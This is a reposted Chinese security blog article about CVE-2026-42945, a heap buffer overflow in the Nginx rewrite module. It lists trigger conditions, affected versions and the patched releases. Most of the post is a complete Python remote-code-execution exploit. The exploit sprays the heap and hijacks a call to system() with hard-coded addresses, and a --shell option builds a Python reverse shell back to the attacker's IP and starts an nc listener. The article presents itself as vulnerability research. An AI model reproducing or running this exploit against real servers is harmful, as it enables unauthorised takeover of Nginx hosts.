CVE-2026-42945,Nginx高危漏洞|可致RCE或服务崩溃

admin
admin
admin
0
文章
0
评论
2026-05-20 06:17:31 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: 该文档详细分析了Nginx服务器CVE-2026-42945高危漏洞,该漏洞在rewrite模块配置满足特定条件时可触发堆缓冲区溢出,导致远程代码执行或服务崩溃。文档提供了完整的漏洞触发条件、影响版本范围和Python编写的POC利用代码,但未包含具体的修复方案或缓解措施。 综合评分: 65 文章分类: 漏洞分析,WEB安全,应急响应,安全工具,红队

cover_image

CVE-2026-42945,Nginx高危漏洞 | 可致RCE或服务崩溃

小白爱学习Sec

2026年5月19日 08:15 云南

在小说阅读器读本章

去阅读

0x1 引言

最近工作也比较忙,公众号也是自己在做,发一些自己的学习知识,以及分享一些小工具这些,自己知识面也比较窄,可能没有那么多的内容来写,尽量做到每周一更或两更,特殊时间可能会多更一些,内容没有太大的深度,有什么不理解的,大家也可以在评论区留言,看到了都会去回复的。

0x2 免责声明

本文旨在提供有关特定漏洞工具或安全风险的详细信息,以帮助安全研究人员、系统管理员和开发人员更好地理解和修复潜在的安全威胁,协助提高网络安全意识并推动技术进步,而非出于任何恶意目的。利用本文提到的漏洞信息或进行相关测试可能会违反法律法规或服务协议。作者不对读者基于本文内容而产生的任何行为或后果承担责任。如有任何侵权问题,请联系作者删除。

0x3 简单介绍

Nginx服务器的rewrite模块配置满足特定条件时,攻击者可以通过发送精心构造的HTTP请求触发堆缓冲区溢出。具体而言,当rewrite指令后跟随rewrite、if或set指令,并且使用了未命名的Perl兼容正则表达式(PCRE)捕获组(如$1或$2),同时替换字符串中包含问号(?)字符时,可触发该漏洞,攻击者无需身份认证即可发起攻击。

影响版本

1.0.0&nbsp;<=&nbsp;NGINX&nbsp;Open&nbsp;Source&nbsp;<=&nbsp;1.30.00.6.27&nbsp;<=&nbsp;NGINX&nbsp;Open&nbsp;Source&nbsp;<=&nbsp;0.9.7R32&nbsp;<=&nbsp;NGINX Plus&nbsp;<&nbsp;R32 P6R36&nbsp;<=&nbsp;NGINX Plus&nbsp;<&nbsp;R36 P4
其他受影响组件:2.16.0&nbsp;<=&nbsp;NGINX Instance Manager&nbsp;<=&nbsp;2.21.15.9.0&nbsp;<=&nbsp;F5 WAF&nbsp;for&nbsp;NGINX&nbsp;<=&nbsp;5.12.14.9.0&nbsp;<=&nbsp;NGINX App Protect WAF&nbsp;<=&nbsp;4.16.05.1.0&nbsp;<=&nbsp;NGINX App Protect WAF&nbsp;<=&nbsp;5.8.0F5 DoS&nbsp;for&nbsp;NGINX&nbsp;4.8.04.3.0&nbsp;<=&nbsp;NGINX App Protect DoS&nbsp;<=&nbsp;4.7.01.3.0&nbsp;<=&nbsp;NGINX Gateway Fabric&nbsp;<=&nbsp;1.6.22.0.0&nbsp;<=&nbsp;NGINX Gateway Fabric&nbsp;<=&nbsp;2.5.13.5.0&nbsp;<=&nbsp;NGINX Ingress Controller&nbsp;<=&nbsp;3.7.24.0.0&nbsp;<=&nbsp;NGINX Ingress Controller&nbsp;<=&nbsp;4.0.15.0.0&nbsp;<=&nbsp;NGINX Ingress Controller&nbsp;<=&nbsp;5.4.1

0x4 漏洞详情

利用条件:在 Nginx 的配置中,必须存在一个rewrite指令,并且该指令同时满足:1、使用了未命名的 PCRE 正则捕获(例如&nbsp;$1,&nbsp;$2&nbsp;等)。2、其替换字符串中包含问号(?)。3、在此 rewrite 指令之后,紧跟着另一个 rewrite、if&nbsp;或&nbsp;set&nbsp;指令。

POC

https://github.com/DepthFirstDisclosures/Nginx-Rift

#!/usr/bin/env python3import&nbsp;argparseimport&nbsp;socketimport&nbsp;structimport&nbsp;timeimport&nbsp;sys
BODY_LEN =&nbsp;4000N_SPRAY =&nbsp;20
SAFE =&nbsp;set()_t = [0xffffffff,&nbsp;0xd800086d,&nbsp;0x50000000,&nbsp;0xb8000001,&nbsp; &nbsp; &nbsp;&nbsp;0xffffffff,&nbsp;0xffffffff,&nbsp;0xffffffff,&nbsp;0xffffffff]for&nbsp;_b&nbsp;in&nbsp;range(256):&nbsp; &nbsp;&nbsp;if&nbsp;not&nbsp;(_t[_b >>&nbsp;5] & (1&nbsp;<< (_b &&nbsp;0x1f))):&nbsp; &nbsp; &nbsp; &nbsp; SAFE.add(_b)
HEAP_BASE =&nbsp;0x555555659000LIBC_BASE =&nbsp;0x7ffff77ba000SYSTEM_ADDR = LIBC_BASE +&nbsp;0x50d70
PREREAD_HEAP_OFFSETS = [&nbsp; &nbsp;&nbsp;0x05a427,&nbsp;0x060e67,&nbsp; &nbsp;&nbsp;0x0ba557,&nbsp;0x0bf367,&nbsp;0x0c4177,&nbsp;0x0c8f87,&nbsp;0x0cdd97,&nbsp; &nbsp;&nbsp;0x0d2ba7,&nbsp;0x0d79b7,&nbsp;0x0dc7c7,&nbsp;0x0e15d7,&nbsp;0x0e63e7,&nbsp; &nbsp;&nbsp;0x0eb1f7,&nbsp;0x0f0007,&nbsp;0x0f4e17,&nbsp;0x0f9c27,&nbsp;0x0fea37,&nbsp; &nbsp;&nbsp;0x103847,&nbsp;0x108657,&nbsp;0x10d467,]

def&nbsp;addr_is_safe(addr):&nbsp; &nbsp;&nbsp;return&nbsp;all(((addr >> (j *&nbsp;8)) &&nbsp;0xff)&nbsp;in&nbsp;SAFE&nbsp;for&nbsp;j&nbsp;in&nbsp;range(6))

def&nbsp;make_body(cmd, data_addr):&nbsp; &nbsp; fake_struct = struct.pack('<QQQ', SYSTEM_ADDR, data_addr,&nbsp;0)&nbsp; &nbsp; cmd_bytes = cmd.encode('utf-8') +&nbsp;b'\x00'&nbsp; &nbsp; payload = fake_struct + cmd_bytes&nbsp; &nbsp;&nbsp;if&nbsp;len(payload) > BODY_LEN:&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;print(f"[!] Command too long (body={len(payload)}, max={BODY_LEN})")&nbsp; &nbsp; &nbsp; &nbsp; sys.exit(1)&nbsp; &nbsp;&nbsp;return&nbsp;payload +&nbsp;b'\x41'&nbsp;* (BODY_LEN -&nbsp;len(payload))

def&nbsp;wait_alive(host, port, timeout=30):&nbsp; &nbsp;&nbsp;for&nbsp;_&nbsp;in&nbsp;range(timeout):&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;try:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; s = socket.create_connection((host, port), timeout=2)&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; s.sendall(b"GET / HTTP/1.1\r\nHost:l\r\nConnection:close\r\n\r\n")&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; s.recv(100)&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; s.close()&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;True&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;except&nbsp;Exception:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; time.sleep(1)&nbsp; &nbsp;&nbsp;return&nbsp;False

def&nbsp;attempt(host, port, target_bytes, body):&nbsp; &nbsp; sprays = []&nbsp; &nbsp;&nbsp;for&nbsp;i&nbsp;in&nbsp;range(N_SPRAY):&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;try:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; s = socket.create_connection((host, port), timeout=5)&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; req = (&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;b"POST /spray HTTP/1.1\r\n"&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;b"Host: l\r\n"&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;b"Content-Length: "&nbsp;+&nbsp;str(BODY_LEN).encode() +&nbsp;b"\r\n"&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;b"X-Delay: 60\r\n"&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;b"Connection: close\r\n"&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;b"\r\n"&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; + body&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; )&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; s.sendall(req)&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; sprays.append(s)&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;except&nbsp;Exception:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;break&nbsp; &nbsp; &nbsp; &nbsp; time.sleep(0.005)&nbsp; &nbsp; time.sleep(0.2)
&nbsp; &nbsp;&nbsp;try:&nbsp; &nbsp; &nbsp; &nbsp; a = socket.create_connection((host, port), timeout=5)&nbsp; &nbsp; &nbsp; &nbsp; time.sleep(0.02)&nbsp; &nbsp; &nbsp; &nbsp; v = socket.create_connection((host, port), timeout=5)&nbsp; &nbsp; &nbsp; &nbsp; time.sleep(0.02)&nbsp; &nbsp;&nbsp;except&nbsp;Exception:&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;for&nbsp;s&nbsp;in&nbsp;sprays:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;try:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; s.close()&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;except&nbsp;Exception:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;pass&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;False
&nbsp; &nbsp; payload =&nbsp;"A"&nbsp;*&nbsp;349&nbsp;+&nbsp;"+"&nbsp;*&nbsp;969&nbsp;+ target_bytes.decode("latin-1")&nbsp; &nbsp; a.sendall((f"GET /api/{payload}&nbsp;HTTP/1.1\r\n"&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;f"Host:localhost\r\n").encode("latin-1"))&nbsp; &nbsp; time.sleep(0.05)&nbsp; &nbsp; v.sendall(b"GET / HTTP/1.1\r\nHost:localhost\r\n")&nbsp; &nbsp; time.sleep(0.05)&nbsp; &nbsp; a.sendall(b"X-Delay:60\r\nConnection:close\r\n\r\n")&nbsp; &nbsp; time.sleep(0.2)
&nbsp; &nbsp; v.close()&nbsp; &nbsp; time.sleep(0.1)
&nbsp; &nbsp; crashed =&nbsp;False&nbsp; &nbsp;&nbsp;try:&nbsp; &nbsp; &nbsp; &nbsp; a.sendall(b"X-Ping:1\r\n")&nbsp; &nbsp; &nbsp; &nbsp; a.settimeout(0.2)&nbsp; &nbsp; &nbsp; &nbsp; data = a.recv(1)&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;not&nbsp;data:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; crashed =&nbsp;True&nbsp; &nbsp;&nbsp;except&nbsp;socket.timeout:&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;# It timed out. Nginx is either alive (waiting for backend) or hung in system().&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;# Let's try to make a new connection to see if the worker is responsive.&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;try:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; check_sock = socket.create_connection((host, port), timeout=0.2)&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; check_sock.sendall(b"GET / HTTP/1.1\r\nHost:localhost\r\nConnection:close\r\n\r\n")&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; check_data = check_sock.recv(10)&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; check_sock.close()&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;not&nbsp;check_data:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; crashed =&nbsp;True&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;else:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; crashed =&nbsp;False&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;except&nbsp;Exception:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; crashed =&nbsp;True&nbsp; &nbsp;&nbsp;except&nbsp;(ConnectionResetError, BrokenPipeError, OSError):&nbsp; &nbsp; &nbsp; &nbsp; crashed =&nbsp;True
&nbsp; &nbsp;&nbsp;for&nbsp;s&nbsp;in&nbsp;sprays:&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;try:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; s.close()&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;except&nbsp;Exception:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;pass&nbsp; &nbsp;&nbsp;try:&nbsp; &nbsp; &nbsp; &nbsp; a.close()&nbsp; &nbsp;&nbsp;except&nbsp;Exception:&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;pass&nbsp; &nbsp;&nbsp;return&nbsp;crashed

def&nbsp;main():&nbsp; &nbsp; parser = argparse.ArgumentParser(&nbsp; &nbsp; &nbsp; &nbsp; description="nginx rift RCE exploit (ASLR disabled)"&nbsp; &nbsp; )&nbsp; &nbsp; parser.add_argument("--host", default="127.0.0.1",&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;help="target host (default: 127.0.0.1)")&nbsp; &nbsp; parser.add_argument("--port",&nbsp;type=int, default=19321,&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;help="target port (default: 19321)")&nbsp; &nbsp; parser.add_argument("--cmd",&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;help="shell command to execute via system()")&nbsp; &nbsp; parser.add_argument("--shell", action="store_true",&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;help="execute a reverse shell back to the attacker")&nbsp; &nbsp; parser.add_argument("--listen-port",&nbsp;type=int, default=1337,&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;help="port to listen on for reverse shell (default: 1337)")&nbsp; &nbsp; parser.add_argument("--listen-ip",&nbsp;type=str, default="172.17.0.1",&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;help="IP address for reverse shell to connect back to (default: 172.17.0.1)")&nbsp; &nbsp; args = parser.parse_args()
&nbsp; &nbsp;&nbsp;if&nbsp;not&nbsp;args.cmd&nbsp;and&nbsp;not&nbsp;args.shell:&nbsp; &nbsp; &nbsp; &nbsp; parser.error("either --cmd or --shell must be specified")&nbsp; &nbsp;&nbsp;if&nbsp;args.cmd&nbsp;and&nbsp;args.shell:&nbsp; &nbsp; &nbsp; &nbsp; parser.error("cannot specify both --cmd and --shell")
&nbsp; &nbsp; host = args.host&nbsp; &nbsp; port = args.port
&nbsp; &nbsp;&nbsp;if&nbsp;args.shell:&nbsp; &nbsp; &nbsp; &nbsp; local_ip = args.listen_ip&nbsp; &nbsp; &nbsp; &nbsp; cmd =&nbsp;f"python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{local_ip}\",{args.listen_port}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'"&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;print(f"[*] Generated reverse shell command:&nbsp;{cmd}")&nbsp; &nbsp;&nbsp;else:&nbsp; &nbsp; &nbsp; &nbsp; cmd = args.cmd
&nbsp; &nbsp;&nbsp;if&nbsp;args.shell:&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;import&nbsp;threading&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;def&nbsp;listen_shell():&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;print(f"[*] Listening for reverse shell on port&nbsp;{args.listen_port}...")&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;# Use netcat if available, otherwise just use a simple socket listener&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;import&nbsp;subprocess&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;try:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; subprocess.run(["nc",&nbsp;"-l",&nbsp;"-p",&nbsp;str(args.listen_port)], check=True)&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;except&nbsp;Exception:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;print(f"[!] Could not start netcat. Please run: nc -l -p&nbsp;{args.listen_port}")
&nbsp; &nbsp; &nbsp; &nbsp; t = threading.Thread(target=listen_shell)&nbsp; &nbsp; &nbsp; &nbsp; t.daemon =&nbsp;True&nbsp; &nbsp; &nbsp; &nbsp; t.start()&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;# Give the listener a moment to start&nbsp; &nbsp; &nbsp; &nbsp; time.sleep(1)
&nbsp; &nbsp; candidates = []&nbsp; &nbsp;&nbsp;for&nbsp;i, off&nbsp;in&nbsp;enumerate(PREREAD_HEAP_OFFSETS):&nbsp; &nbsp; &nbsp; &nbsp; addr = HEAP_BASE + off&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;addr_is_safe(addr):&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; candidates.append((i, addr))
&nbsp; &nbsp; primary_addr = candidates[0][1]&nbsp; &nbsp; data_addr = primary_addr +&nbsp;24&nbsp; &nbsp; body = make_body(cmd, data_addr)
&nbsp; &nbsp;&nbsp;print(f"[*] Waiting for nginx on&nbsp;{host}:{port}...")&nbsp; &nbsp;&nbsp;if&nbsp;not&nbsp;wait_alive(host, port):&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;print("[!] nginx not responding")&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;1&nbsp; &nbsp;&nbsp;print("[+] Connected.")
&nbsp; &nbsp; TRIES_PER_CANDIDATE =&nbsp;10
&nbsp; &nbsp;&nbsp;for&nbsp;i, addr&nbsp;in&nbsp;candidates:&nbsp; &nbsp; &nbsp; &nbsp; target =&nbsp;bytes([(addr >> (j *&nbsp;8)) &&nbsp;0xff&nbsp;for&nbsp;j&nbsp;in&nbsp;range(6)])
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;for&nbsp;t&nbsp;in&nbsp;range(TRIES_PER_CANDIDATE):&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;not&nbsp;wait_alive(host, port, timeout=10):&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; time.sleep(2)&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;not&nbsp;wait_alive(host, port, timeout=10):&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;print(" &nbsp; &nbsp;server not recovering, aborting")&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;1
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; crashed = attempt(host, port, target, body)&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;crashed:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;args.shell:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;try:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;while&nbsp;True:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; time.sleep(1)&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;except&nbsp;KeyboardInterrupt:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;pass&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;else:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;print(f"[+] try&nbsp;{t +&nbsp;1}/{TRIES_PER_CANDIDATE}&nbsp;"&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;f"crashed — system(\"{cmd}\") executed")&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;print(f"[+] Done.")&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return&nbsp;0&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; time.sleep(0.3)
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;print("[+] All candidates tried — no crash detected.")&nbsp; &nbsp;&nbsp;return&nbsp;0

if&nbsp;__name__ ==&nbsp;"__main__":&nbsp; &nbsp; sys.exit(main())

修复补丁:

F5 已发布 NGINX 1.31.0/1.30.1 版进行修复:开源版的 NGINX 需升级到 1.30.1 版或 1.31.0 版,其他旧版本例如 0.6.27~1.30.0 版均受漏洞影响。

往期推荐

一款文件上传漏洞检测工具|支持多种文件上传绕过技术

【工具推荐】微信小程序一键反编译与敏感信息审计 | MPscan

【工具推荐】一款专为渗透测试人员设计的 API 接口自动化检测工具 | ApiHunter接口测试

【工具推荐】ActiveMQ全系列漏洞一键支持检测和利用工具 | ActiveMQ漏洞利用工具

整理了一些ERP安装包的下载链接 | 主要是用友、金蝶等ERP下载链接

免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:小白爱学习Sec 《CVE-2026-42945,Nginx高危漏洞 | 可致RCE或服务崩溃》

版权声明

本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。

ZONE.CI 全球网 | 安全领域涉猎者-乌云独行地带
ZONE.CI 全球网
安全领域涉猎者-乌云独行地带
ZONE.CI 全球网 | 安全领域涉猎者-乌云独行地带
安全领域涉猎者-乌云独行地带
ZONE.CI 全球网
评论:0   参与:  0